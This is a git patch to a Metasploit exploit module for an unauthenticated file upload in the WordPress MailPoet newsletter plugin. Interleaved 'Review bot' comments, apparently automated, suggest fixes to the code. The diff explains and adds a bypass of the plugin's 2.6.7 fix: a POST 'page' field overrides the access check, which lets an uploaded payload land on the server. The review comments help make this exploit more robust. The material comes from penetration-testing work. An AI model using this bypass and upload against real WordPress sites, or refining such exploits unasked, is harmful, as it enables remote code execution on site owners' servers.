From d5843f8eaf864871d95ce6dd18f56500b2158d9d Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer
Date: Sun, 6 Jul 2014 10:53:40 +0200
Subject: [PATCH] Updated Mailpoet exploit to work with another version

---
 .../webapp/wp_wysija_newsletters_upload.rb | 18 +++++++++++++-----
 1 file changed, 13 insertions(+), 5 deletions(-)

diff --git a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
index d68c732195..76a6f39bff 100644
--- a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
+++ b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
@@ -15,11 +15,16 @@ class Metasploit3 < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => 'Wordpress MailPoet (wysija-newsletters) Unauthenticated File Upload',
 'Description' => %q{
- The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.7
+ The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.8
 is vulnerable to an unauthenticated file upload. The exploit uses the Upload Theme functionality to upload a zip file containing the payload. The plugin used the admin_init hook, which is also executed for unauthenticated users when accessing
- a specific URL.
+ a specific URL. The developers tried to fix the vulnerablility in version 2.6.7 but the fix can be bypassed. In PHPs default configuration, a POST variable overwrites a GET variable in the $_REQUEST array. The plugin uses $_REQUEST to check for access rights. By setting the POST parameter to something not beginning with 'wysija_', the check is bypassed. Wordpress uses the $_GET array to determine the page and is so not affected by this.
 },
 'Author' =>
 [
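Review bot: The new Description text carries a typo, `vulnerablility`, and `In PHPs default configuration` should read `In PHP's default configuration`; this string is what `info` shows to users, so it is worth correcting before merge. The closing sentence `and is so not affected by this` reads awkwardly and would be clearer as `and is therefore not affected by this`. The unchanged context line `The plugin used the admin_init hook` also mixes tense with the rest of the paragraph, which is in the present (`is vulnerable`, `uses $_REQUEST`), so `uses` would read consistently. The enclosing `initialize` and its `update_info` call begin before and end after this hunk.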
@@ -29,12 +34,14 @@ class Metasploit3 < Msf::Exploit::Remote
 'License' => MSF_LICENSE,
 'References' =>
 [
- [ 'URL', 'http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html' ]
+ [ 'URL', 'http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html' ],
+ [ 'URL', 'http://www.mailpoet.com/security-update-part-2/'],
+ [ 'URL', 'https://plugins.trac.wordpress.org/changeset/943427/wysija-newsletters/trunk/helpers/back.php']
 ],
 'Privileged' => false,
 'Platform' => ['php'],
 'Arch' => ARCH_PHP,
- 'Targets' => [ ['wysija-newsletters < 2.6.7', {}] ],
+ 'Targets' => [ ['wysija-newsletters < 2.6.8', {}] ],
 'DefaultTarget' => 0,
 'DisclosureDate' => 'Jul 1 2014'))
 end
@@ -81,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote
 print_status("#{peer} - Found version #{version} of the plugin")
- if Gem::Version.new(version) < Gem::Version.new('2.6.7')
+ if Gem::Version.new(version) < Gem::Version.new('2.6.8')
 return Msf::Exploit::CheckCode::Appears
 else
 return Msf::Exploit::CheckCode::Safe
@@ -101,6 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote
 data.add_part('on', nil, nil, 'form-data; name="overwriteexistingtheme"')
 data.add_part('themeupload', nil, nil, 'form-data; name="action"')
 data.add_part('Upload', nil, nil, 'form-data; name="submitter"')
+ data.add_part(rand_text_alpha(10), nil, nil, 'form-data; name="page"')
 post_data = data.to_s
 payload_uri = normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wysija', 'themes', theme_name, payload_name)
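Review bot: The fixed version `2.6.8` is now written out in three separate places — the Description in the first hunk, the Targets entry `'wysija-newsletters < 2.6.8'` here, and the `Gem::Version.new('2.6.8')` comparison in the check hunk that follows — so the next bump risks updating one and missing another, exactly the kind of edit this commit had to make three times. A single class-level constant, e.g. `FIXED_VERSION = '2.6.8'`, interpolated into the target name and used in the comparison keeps the three in step. The `update_info` call that holds this hash begins before the hunk.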
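Review bot: `Gem::Version.new(version)` raises `ArgumentError` when `version` is not a well-formed version string, and nothing in this hunk guards against that, so a malformed value would abort `check` with an exception instead of a result. How `version` is extracted lies outside the hunk; if that scrape can yield an empty string or a stray fragment, a guard such as `return Msf::Exploit::CheckCode::Unknown unless Gem::Version.correct?(version)` placed before the comparison keeps `check` total. The explicit `return` in both branches could also give way to the value of the `if` expression, the idiomatic Ruby form. The `check` method begins and ends outside this hunk.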
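Review bot: The new `page` form part is the reason the module now works against 2.6.7, as the Description explains, but nothing at the call site says so; a reader sees a random ten-letter value in a field named `page` and has no hint that it is load-bearing. A one-line comment above it, `# POST 'page' takes precedence in $_REQUEST, so the 2.6.7 access check sees a value not prefixed 'wysija_'`, ties the line to that explanation. Choosing `rand_text_alpha` over a fixed string is sound, since purely alphabetic output cannot carry the underscore in that prefix. The enclosing method, presumably `exploit`, begins and ends outside this hunk.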